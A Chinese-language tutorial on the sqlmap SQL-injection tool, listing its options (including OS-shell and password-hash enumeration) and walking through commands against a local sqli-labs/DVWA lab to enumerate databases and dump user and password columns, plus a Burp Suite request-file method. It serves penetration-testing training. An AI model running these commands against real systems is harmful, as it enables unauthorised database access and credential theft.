sqlmap常用使用方法
文章目录
- sqlmap手册
- sqlmap实战演示
- 探测注入点
- 列出所有数据库
- 列出指定数据库表
- 查询指定表内字段
- 查询字段中的内容
- post方法
sqlmap手册
slqmap常用使用方法Usage: python sqlmap [options]Options:-h, --help 帮助-hh 帮助--version sqlmap版本-v VERBOSE 显示Verbosity level: 0-6 (default 1)探测目标:-u URL, --url=URL 探测目标Target URL (e.g. "http://www.site.com/vuln.php?id=1")-r REQUESTFILE 加载请求文件,通常post-g GOOGLEDORK Process Google dork results as target URLs请求参数:--data=DATA Data string to be sent through POST--cookie=COOKIE HTTP Cookie header value--random-agent Use randomly selected HTTP User-Agent header value--proxy=PROXY Use a proxy to connect to the target URL--tor Use Tor anonymity network--check-tor Check to see if Tor is used properly-p TESTPARAMETER 指定探测参数Testable parameter(s)--dbms=DBMS 指定数据库类型--dbms=mysql--level=LEVEL 探测级别 (1-5, default 1)
--risk=RISK 风险等级 (1-3, default 1)--technique=TECH 注入技术(default "BEUSTQ")-a, --all Retrieve everything-b, --banner Retrieve DBMS banner--current-user 当前用户--current-db 当前数据库--passwords Enumerate DBMS users password hashes--tables Enumerate DBMS database tables--columns Enumerate DBMS database table columns--schema Enumerate DBMS schema--dump 保存数据到文件Dump DBMS database table entries--dump-all Dump all DBMS databases tables entries-D DB -D 数据库名-T TBL -T 表名-C COL -C 字段名1,2...--os-shell Prompt for an interactive operating system shell--os-pwn Prompt for an OOB shell, Meterpreter or VNC--batch 不询问,按默认行为--flush-session 刷新会话文件,Flush session files for current target--sqlmap-shell Prompt for an interactive sqlmap shell--wizard Simple wizard interface for beginner users--threads=THREADS 线程数如 threads 5 (default 1)
sqlmap实战演示
探测注入点
sqlmap -u "http://192.168.199.100/sqli/Less-1/?id=1" --batch --threads=10
显示结果
列出所有数据库
sqlmap -u "http://192.168.199.100/sqli/Less-1/?id=1" --dbs --batch --threads=10
列出指定数据库表
sqlmap -u "http://192.168.199.100/sqli/Less-1/?id=1" -D dvwa --tables --batch --threads=10
查询指定表内字段
sqlmap -u "http://192.168.199.100/sqli/Less-1/?id=1" -D dvwa -T users --columns --batch --threads=10
查询字段中的内容
sqlmap -u "http://192.168.199.100/sqli/Less-1/?id=1" -D dvwa -T users -C "user,password" --dump --batch --threads=10
–dump 会被保存下来
post方法
用burpsuite截断请求,复制请求信息,写入re.txt
burpsuite开启代理设置
浏览器设置代理
浏览器访问对应web注入点
在burp上复制截断的请求,保存到re.txt文件
执行sql注入命令
-r 加载请求的文件,-p携带注入参数
sqlmap -r "re.txt" -p "uname" --current-db --batch --threads=10
显示结果
sqlmap常用使用方法相关推荐
- 使用TkMybatis逆向生成带中文注释文件,并使用其常用的方法
首先说明,博主用的是springboot,如使用原生态的mybatis的一些配置文件请自行百度 贴上pom文件 <?xml version="1.0" encoding=&q ...
- Web安全工具—Sqlmap常用命令和参数(持续更新)
Web安全工具-SQLMAP常用命令和参数 简介:此篇文章主要记录学习注入神器sqlmap的过程,文章会对常见参数进行详解(附图),适合入门学习. 一:SQLMAP介绍: 简介:sqlmap是一个由p ...
- 2022 全球网络黑客常用攻击方法 Top10
近几年,借助互联网产业发展的东风,网络黑产也迎来更加巅峰的状态,不论是从攻击效率,组织规模,亦或是收益变现能力,都在一天天变的成熟完善.根据艾瑞咨询 2020 年发布的<现代网络诈骗分析报告&g ...
- 渗透测试-SQL注入之sqlmap的使用方法及实战案例
SQL注入之sqlmap的使用方法及实战案例 文章目录 SQL注入之sqlmap的使用方法及实战案例 前言 一.sqlmap的使用方法 查库,表,列,以及相关的字段的信息 万能密码汇总 判断是否为字符 ...
- 2022 全球网络黑产常用攻击方法 Top 10
近几年,借助互联网产业发展的东风,网络黑产也迎来更加巅峰的状态,不论是从攻击效率,组织规模,亦或是收益变现能力,都在一天天变的成熟完善.根据艾瑞咨询 2020 年发布的<现代网络诈骗分析报告&g ...
- android屏幕密度高度,Android获取常用辅助方法(获取屏幕高度、宽度、密度、通知栏高度、截图)...
我们需要获取Android手机或Pad的屏幕的物理尺寸,以便于界面的设计或是其他功能的实现.下面就分享一下Android中常用的一些辅助方法: 获取屏幕高度: /** * 获得屏幕高度 * @para ...
- 多线程2(常用的方法:join、interrupt、currentThread、isAlive、setDaemon...)
常用的方法: 1.join()方法: join()方法:执行该方法的线程进入阻塞状态,直到调用该方法的线程结束后再由阻塞状态转为就绪状态. 示例: package venus;import java. ...
- 基于 Python 的 8 种常用抽样方法
抽样是统计学.机器学习中非常重要,也是经常用到的方法,因为大多时候使用全量数据是不现实的,或者根本无法取到.所以我们需要抽样,比如在推断性统计中,我们会经常通过采样的样本数据来推断估计总体的样本. 上 ...
- 病理分析常见数据集及常用模型方法总结
病理分析常见数据集及常用模型方法总结 目录 病理分析常见数据集 病理图像分类常见处理方法 病理图像常见数据集详细说明 相关论文梳理
最新文章
- java编写socket使用bufferedReader.readLine()问题研究
- web 点击劫持 X-Frame-Options
- 【运筹学】线性规划数学模型 ( 单纯形法 | 第一次迭代 | 方程组同解变换 | 计算新单纯形表 | 计算检验数 | 入基变量选择 | 出基变量选择 )
- [云炬python3玩转机器学习笔记] 1-3课程所使用的主要技术栈
- Linux CentOS 7 YouCompleteMe相关配置。
- Sentinel 源码分析(一)
- pip install时发生raise ReadTimeoutError(self._pool, None, 'Read timed out.')的解决方案
- oracle数据库read only,oracle 报错Linux-x86_64 Error: 30: Read-only file system
- fastreport dll_报表如何连接到VistaDB嵌入式数据库?FastReport.Net轻松搞定
- 数据结构之外部排序:最佳归并树
- 关于Spring注解开发教程,打包全送你
- php 禁止ajax 重复请求,js ajax请求防止重复提交
- 对动画队列的初步了解
- AMESim软件包 百度云下载
- win10 java8 环境变量_win10下安装JDK8和环境变量配置
- 如何用latex高效写毕业论文(超简明+实用经验分享)
- PICKIT3 WIN10 无法连接问题解决
- C#中DataTime.Now函数详解
- java.sql.SQLException: The server time zone value 'XXX' is unrecognized or represents more tha
- ImageMagicK之合成图片